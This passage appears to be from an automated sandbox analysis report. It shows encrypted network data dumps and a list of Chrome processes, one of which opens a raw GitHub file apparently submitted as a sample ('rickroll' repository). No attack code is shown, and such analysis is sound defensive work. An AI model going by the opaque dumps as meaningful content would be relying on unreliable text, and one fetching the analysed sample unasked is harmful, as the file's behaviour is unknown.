                    2025-03-10 13:15:54 UTC1378INData Raw: 30 6a 62 4e 35 6f 2f 38 4b 74 39 59 35 36 46 68 61 76 50 78 78 32 49 75 31 61 64 77 63 54 32 6a 50 6a 61 4b 53 52 31 2f 55 62 69 77 61 33 56 66 6f 38 64 53 35 39 43 64 36 36 68 47 33 73 61 2f 77 6e 32 49 44 6e 53 32 54 64 30 52 50 2b 52 5a 64 70 64 4a 2f 44 76 30 33 38 41 2f 45 57 74 37 6f 39 61 4b 50 31 34 33 38 78 6a 4e 76 34 41 30 5a 5a 2f 73 4b 76 36 4d 7a 59 68 37 66 30 6e 62 39 44 50 4d 63 43 6f 31 48 50 6d 49 68 58 73 45 72 50 2f 36 4a 55 4e 6c 31 6f 67 36 67 2f 77 35 31 38 38 6a 72 34 73 66 35 46 56 2b 6a 52 6f 79 7a 37 35 72 67 4d 58 50 76 76 52 4c 30 49 62 33 34 72 31 68 32 34 54 66 43 56 2b 79 6e 76 70 2f 39 34 2f 59 64 77 2f 75 4d 6d 44 52 56 48 67 4e 69 50 62 77 2b 49 57 66 47 66 38 57 2b 77 48 51 47 58 34 70 4b 4e 6d 59 54 62 68 62 30 43 2f
                    Data Ascii: 0jbN5o/8Kt9Y56FhavPxx2Iu1adwcT2jPjaKSR1/Ubiwa3Vfo8dS59Cd66hG3sa/wn2IDnS2Td0RP+RZdpdJ/Dv038A/EWt7o9aKP1438xjNv4A0ZZ/sKv6MzYh7f0nb9DPMcCo1HPmIhXsErP/6JUNl1og6g/w5188jr4sf5FV+jRoyz75rgMXPvvRL0Ib34r1h24TfCV+ynvp/94/Ydw/uMmDRVHgNiPbw+IWfGf8W+wHQGX4pKNmYTbhb0C/
                    2025-03-10 13:15:54 UTC1378INData Raw: 2f 4f 51 51 50 4d 4b 2f 35 42 58 6e 44 32 33 41 7a 45 74 50 4f 4f 73 43 30 36 50 78 44 69 37 56 79 78 4c 32 6c 66 4d 6c 50 41 76 7a 6a 67 37 78 4f 51 44 67 71 33 59 67 46 73 55 50 44 34 30 67 77 66 58 4f 4d 54 77 67 73 56 47 58 70 46 66 50 2f 61 79 4a 6b 59 6e 34 78 56 32 52 2f 43 59 56 79 78 69 33 56 63 69 78 6c 6b 73 72 7a 48 41 6f 56 33 57 44 4c 36 4b 48 30 66 4f 68 2b 35 52 4c 44 59 2f 50 78 36 38 30 72 48 66 6b 62 38 50 2f 56 66 4d 51 4c 74 50 37 30 4e 39 68 64 73 37 2b 67 77 30 39 6c 35 35 35 4c 31 68 32 76 58 61 32 77 39 2b 58 4c 4c 36 68 2b 61 56 62 73 50 68 56 37 77 5a 4f 44 77 63 66 73 32 38 34 6c 37 41 4f 2f 77 4b 66 6d 48 42 6a 48 55 62 73 42 75 2f 4a 6d 2b 6f 32 76 52 52 4e 62 2b 71 71 58 47 71 55 37 35 55 52 76 70 78 4f 37 6e 61 48 48 2b 79
                    Data Ascii: /OQQPMK/5BXnD23AzEtPOOsC06PxDi7VyxL2lfMlPAvzjg7xOQDgq3YgFsUPD40gwfXOMTwgsVGXpFfP/ayJkYn4xV2R/CYVyxi3VcixlksrzHAoV3WDL6KH0fOh+5RLDY/Px680rHfkb8P/VfMQLtP70N9hds7+gw09l555L1h2vXa2w9+XLL6h+aVbsPhV7wZODwcfs284l7AO/wKfmHBjHUbsBu/Jm+o2vRRNb+qqXGqU75URvpxO7naHH+y
                    2025-03-10 13:15:54 UTC1378INData Raw: 47 32 59 35 48 6a 4c 4e 6e 7a 32 31 50 4e 78 6c 6e 67 35 6a 39 78 2f 61 69 78 74 6d 38 51 76 2f 37 78 46 68 61 66 63 58 4f 6c 45 56 4d 47 38 76 2f 38 4e 7a 4b 4f 4f 73 37 53 68 62 47 79 67 2b 43 76 53 46 31 58 78 46 6c 68 63 48 77 38 4c 6e 35 6f 66 33 58 76 4f 4a 6d 58 37 39 36 4a 50 5a 63 53 4f 43 61 43 72 33 38 58 68 79 36 50 50 76 4d 5a 42 31 37 4c 75 2f 59 56 2b 7a 6f 44 69 56 69 5a 4b 64 4a 37 62 6e 6e 31 6a 78 53 78 50 51 76 6e 55 57 52 65 69 78 70 48 6a 4c 72 4b 48 76 71 6d 43 4c 47 57 64 35 67 46 38 42 34 41 41 50 47 32 56 70 61 62 55 53 42 4d 42 49 42 34 53 73 44 78 68 6e 61 32 52 6c 6e 66 5a 2f 78 6b 6c 34 69 78 74 6d 39 59 70 77 47 71 77 69 56 70 47 72 51 48 43 38 5a 65 38 35 7a 2b 65 50 42 4b 2f 71 45 4e 76 41 52 43 49 5a 58 50 74 45 63 62 66
                    Data Ascii: G2Y5HjLNnz21PNxlng5j9x/aixtm8Qv/7xFhafcXOlEVMG8v/8NzKOOs7ShbGyg+CvSF1XxFlhcHw8Ln5of3XvOJmX796JPZcSOCaCr38Xhy6PPvMZB17Lu/YV+zoDiViZKdJ7bnn1jxSxPQvnUWReixpHjLrKHvqmCLGWd5gF8B4AAPG2VpabUSBMBIB4SsDxhna2RlnfZ/xkl4ixtm9YpwGqwiVpGrQHC8Ze85z+ePBK/qENvARCIZXPtEcbf
                    2025-03-10 13:15:54 UTC1378INData Raw: 57 64 44 46 63 50 4a 55 65 4d 63 6a 35 67 74 41 35 6f 2f 66 65 4e 4d 2f 50 71 4a 4a 62 74 6a 43 4c 39 72 36 62 44 33 69 6e 31 44 33 37 37 68 6c 59 38 4e 37 54 33 4f 2b 79 47 38 63 68 76 45 38 49 37 79 33 65 32 47 6a 38 6e 73 43 73 2f 6d 56 36 44 74 41 71 2f 6b 78 6c 66 45 6f 48 65 73 57 65 2b 64 44 61 2b 59 6c 7a 37 70 76 42 4e 35 70 52 74 71 42 6b 5a 6a 34 4a 56 41 67 58 53 6a 77 4a 74 65 77 55 73 66 61 39 72 64 66 38 55 4e 38 42 4e 46 32 34 33 6d 59 78 69 65 36 43 76 36 6d 46 65 38 6b 55 67 67 46 57 44 57 66 55 58 61 79 52 73 66 6d 7a 66 43 62 6c 67 4e 64 46 38 52 31 76 39 59 67 69 6b 4f 32 32 37 75 68 62 58 35 4a 37 7a 69 2b 48 73 4f 49 73 62 73 61 46 35 78 52 6c 44 43 77 5a 41 42 62 43 2f 65 4b 35 39 34 64 70 4d 4d 79 43 63 64 6c 6f 6b 67 35 68 4a 31
                    Data Ascii: WdDFcPJUeMcj5gtA5o/feNM/PqJJbtjCL9r6bD3in1D377hlY8N7T3O+yG8chvE8I7y3e2Gj8nsCs/mV6DtAq/kxlfEoHesWe+dDa+Ylz7pvBN5pRtqBkZj4JVAgXSjwJtewUsfa9rdf8UN8BNF243mYxie6Cv6mFe8kUggFWDWfUXayRsfmzfCblgNdF8R1v9YgikO227uhbX5J7zi+HsOIsbsaF5xRlDCwZABbC/eK594dpMMyCcdlokg5hJ1
                    2025-03-10 13:15:54 UTC1378INData Raw: 2b 4b 39 78 54 50 77 7a 71 76 71 4b 57 74 76 65 4b 39 38 37 41 4b 2f 61 64 69 41 6e 6f 76 79 4b 61 4f 2b 7a 47 61 38 42 74 4e 72 2b 43 74 39 37 37 6c 52 34 44 44 72 34 53 4b 49 78 77 4d 4a 31 58 6a 45 72 64 59 47 68 37 5a 76 4f 39 58 2b 6d 73 6f 4c 75 58 62 76 46 4b 31 39 42 32 58 75 47 50 42 4e 6a 41 4b 78 38 48 61 39 76 47 6f 4e 6c 58 34 70 68 5a 55 4e 46 58 38 48 69 76 4d 50 74 2f 30 6e 33 46 7a 52 77 30 75 6e 6c 62 75 70 42 2f 66 7a 77 53 30 2f 5a 65 4d 56 67 5a 73 2f 6c 4a 2f 35 56 48 7a 43 55 47 4d 59 5a 72 38 47 4b 4c 45 4c 36 43 78 76 6a 56 36 38 57 6b 71 56 31 4d 47 48 2f 6c 6b 58 33 46 58 33 56 57 75 39 6c 2f 52 57 64 47 58 68 47 6a 36 64 37 67 58 67 53 71 66 55 58 52 30 6c 63 6b 53 2b 33 31 59 56 50 69 58 69 2f 79 44 68 44 37 32 4c 78 68 72 54
                    Data Ascii: +K9xTPwzqvqKWtveK987AK/adiAnovyKaO+zGa8BtNr+Ct977lR4DDr4SKIxwMJ1XjErdYGh7ZvO9X+msoLuXbvFK19B2XuGPBNjAKx8Ha9vGoNlX4phZUNFX8HivMPt/0n3FzRw0unlbupB/fzwS0/ZeMVgZs/lJ/5VHzCUGMYZr8GKLEL6CxvjV68WkqV1MGH/lkX3FX3VWu9l/RWdGXhGj6d7gXgSqfUXR0lckS+31YVPiXi/yDhD72LxhrT
                    2025-03-10 13:15:54 UTC1378INData Raw: 51 66 36 79 65 48 44 63 51 57 6f 71 4e 38 79 42 33 32 79 38 5a 56 50 39 4a 58 44 4c 75 54 4f 4b 39 36 6f 37 53 74 42 36 4c 44 35 46 66 37 44 76 63 4a 76 64 64 34 59 65 73 58 67 33 2b 38 6a 2f 67 71 39 70 4b 2f 63 47 6a 46 36 78 5a 4b 4d 35 79 74 38 4b 66 37 4b 49 79 59 5a 54 7a 4a 50 65 66 44 4f 51 43 39 34 52 58 72 67 56 34 4a 33 41 70 58 6d 76 66 4c 6a 39 6f 31 50 6d 42 47 39 64 2b 4b 76 45 42 39 36 50 6d 4c 6e 6e 61 46 58 50 72 47 64 66 43 49 4d 48 37 77 79 65 76 52 6f 4e 42 70 31 58 2b 6d 38 45 58 6b 6c 37 41 55 36 57 6a 53 62 76 74 52 2f 70 59 4d 59 4f 45 61 6e 55 46 2b 36 7a 53 76 4f 71 39 56 42 62 52 36 2b 4a 7a 43 75 6f 78 74 66 43 63 57 4b 49 2b 36 62 58 75 6d 79 6f 73 2b 63 6b 56 64 75 6c 73 72 59 4b 2f 35 51 62 76 48 4b 34 63 32 76 42 4f 70 43
                    Data Ascii: Qf6yeHDcQWoqN8yB32y8ZVP9JXDLuTOK96o7StB6LD5Ff7DvcJvdd4YesXg3+8j/gq9pK/cGjF6xZKM5yt8Kf7KIyYZTzJPefDOQC94RXrgV4J3ApXmvfLj9o1PmBG9d+KvEB96PmLnnaFXPrGdfCIMH7wyevRoNBp1X+m8EXkl7AU6WjSbvtR/pYMYOEanUF+6zSvOq9VBbR6+JzCuoxtfCcWKI+6bXumyos+ckVdulsrYK/5QbvHK4c2vBOpC
                    2025-03-10 13:15:54 UTC1378INData Raw: 54 65 2f 63 69 53 2f 6b 62 47 6f 55 50 58 67 46 4f 34 53 76 79 78 38 41 2f 39 49 70 6d 63 50 78 50 4e 2f 5a 4a 72 33 44 6a 39 33 70 46 66 49 58 4f 4b 2f 48 47 38 6f 52 70 62 64 4d 30 31 47 4b 4d 75 50 76 4f 7a 71 72 6e 43 70 73 55 7a 36 47 6d 52 2b 53 6e 75 67 72 2b 59 35 31 55 62 61 68 4e 35 55 73 44 77 76 76 49 66 38 56 32 59 52 2f 74 79 66 32 70 58 33 64 65 38 64 37 6b 6e 77 36 47 67 77 6a 2f 4b 66 71 4f 2f 72 52 6a 43 31 36 4a 76 65 43 61 65 58 31 6f 70 2f 46 58 51 6d 70 59 4e 4f 58 50 54 2b 77 72 75 6f 68 71 46 6a 72 35 65 2f 6e 46 4a 79 4e 39 45 4f 32 46 58 34 50 62 70 6a 4d 6a 66 5a 6d 75 58 53 2b 50 37 47 54 79 4b 30 69 4a 2f 6a 67 6e 59 61 55 2f 66 70 50 54 7a 50 34 72 39 73 45 72 76 4a 72 37 34 2f 4b 4b 51 32 73 55 65 30 58 48 77 6d 67 64 49 71
                    Data Ascii: Te/ciS/kbGoUPXgFO4Svyx8A/9IpmcPxPN/ZJr3Dj93pFfIXOK/HG8oRpbdM01GKMuPvOzqrnCpsUz6GmR+Snugr+Y51UbahN5UsDwvvIf8V2YR/tyf2pX3de8d7knw6Ggwj/KfqO/rRjC16JveCaeX1op/FXQmpYNOXPT+wruohqFjr5e/nFJyN9EO2FX4PbpjMjfZmuXS+P7GTyK0iJ/jgnYaU/fpPTzP4r9sErvJr74/KKQ2sUe0XHwmgdIq
                    2025-03-10 13:15:54 UTC1378INData Raw: 6c 6e 36 65 4b 54 2f 35 38 66 6f 57 6d 35 67 76 72 41 74 76 58 66 4e 72 38 34 34 65 31 33 49 46 78 32 66 33 6e 55 64 43 31 43 35 77 53 63 63 42 48 72 76 75 47 36 59 51 37 76 76 71 41 37 35 52 47 54 53 76 68 42 39 78 52 6a 6e 6a 36 45 46 32 51 63 49 2b 33 6a 55 66 63 57 38 41 4c 7a 45 30 49 61 49 79 5a 42 38 34 2b 78 5a 4e 51 6d 64 62 49 43 6d 37 2b 67 50 66 2f 67 4d 53 75 4b 51 6a 38 30 4c 48 68 47 35 47 33 70 30 58 71 53 68 65 39 6d 7a 7a 51 59 66 61 64 38 50 67 77 2f 31 2f 2b 70 6d 36 43 76 61 78 65 45 6d 34 36 79 39 2b 43 4e 41 52 34 46 78 50 74 52 2f 70 42 63 73 39 58 77 69 4a 44 5a 39 36 45 43 47 6a 50 50 48 62 4a 77 36 76 6f 77 5a 61 63 38 34 6d 34 6e 6e 51 50 43 54 6a 2f 33 5a 31 35 64 48 67 61 56 31 4c 37 41 4e 4f 4f 54 51 55 61 6c 73 4b 50 78 6f
                    Data Ascii: ln6eKT/58foWm5gvrAtvXfNr844e13IFx2f3nUdC1C5wSccBHrvuG6YQ7vvqA75RGTSvhB9xRjnj6EF2QcI+3jUfcW8ALzE0IaIyZB84+xZNQmdbICm7+gPf/gMSuKQj80LHhG5G3p0XqShe9mzzQYfad8Pgw/1/+pm6CvaxeEm46y9+CNAR4FxPtR/pBcs9XwiJDZ96ECGjPPHbJw6vowZac84m4nnQPCTj/3Z15dHgaV1L7ANOOTQUalsKPxo
                    2025-03-10 13:15:54 UTC1378INData Raw: 6b 6c 64 69 61 73 33 33 6c 6b 62 61 31 39 4e 70 73 6e 42 55 74 2b 77 57 2b 32 6d 53 63 4e 51 6e 41 43 79 47 4b 6d 4b 46 63 33 7a 67 2f 45 75 71 41 41 4a 2f 77 2f 43 69 2f 4b 5a 62 38 2b 4b 2f 49 6c 2f 52 77 78 4d 43 76 65 49 72 41 6a 74 56 37 52 54 46 67 46 58 4b 6f 76 64 68 46 52 2b 33 4b 65 38 58 42 45 76 50 4d 75 5a 6e 4f 4b 77 59 7a 70 7a 6e 30 59 39 45 61 6e 79 41 42 2b 49 6c 37 78 58 35 76 68 75 39 4e 77 59 2f 72 41 77 62 41 4b 36 62 76 77 36 68 78 78 69 64 65 46 6f 44 4e 5a 76 44 4b 53 45 6a 36 69 58 32 46 48 77 41 57 6a 59 5a 75 37 43 73 4d 33 54 78 75 2b 4f 59 56 6f 77 53 44 56 32 4c 47 32 66 54 6a 32 65 61 67 46 38 73 68 31 6a 68 62 31 4e 77 72 4d 68 5a 6e 4e 2f 6b 64 2f 4b 61 76 6d 45 65 31 71 72 79 43 67 57 6b 33 32 67 4d 44 37 2f 54 69 65 77
                    Data Ascii: kldias33lkba19NpsnBUt+wW+2mScNQnACyGKmKFc3zg/EuqAAJ/w/Ci/KZb8+K/Il/RwxMCveIrAjtV7RTFgFXKovdhFR+3Ke8XBEvPMuZnOKwYzpzn0Y9EanyAB+Il7xX5vhu9NwY/rAwbAK6bvw6hxxideFoDNZvDKSEj6iX2FHwAWjYZu7CsM3Txu+OYVowSDV2LG2fTj2eagF8sh1jhb1NwrMhZnN/kd/KavmEe1qryCgWk32gMD7/Tiew


                    Click to jump to process

                    Click to jump to process

                    Click to jump to process

                    Target ID:2
                    Start time:09:15:33
                    Start date:10/03/2025
                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                    Imagebase:0x7ff63b000000
                    File size:3'388'000 bytes
                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:false

                    Target ID:3
                    Start time:09:15:38
                    Start date:10/03/2025
                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,18210615056389622539,8746742493678263867,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2012 /prefetch:3
                    Imagebase:0x7ff63b000000
                    File size:3'388'000 bytes
                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:false

                    Target ID:12
                    Start time:09:15:44
                    Start date:10/03/2025
                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://github.com/fenwikk/rickroll/raw/main/roll.p1"
                    Imagebase:0x7ff63b000000
                    File size:3'388'000 bytes
                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    No disassembly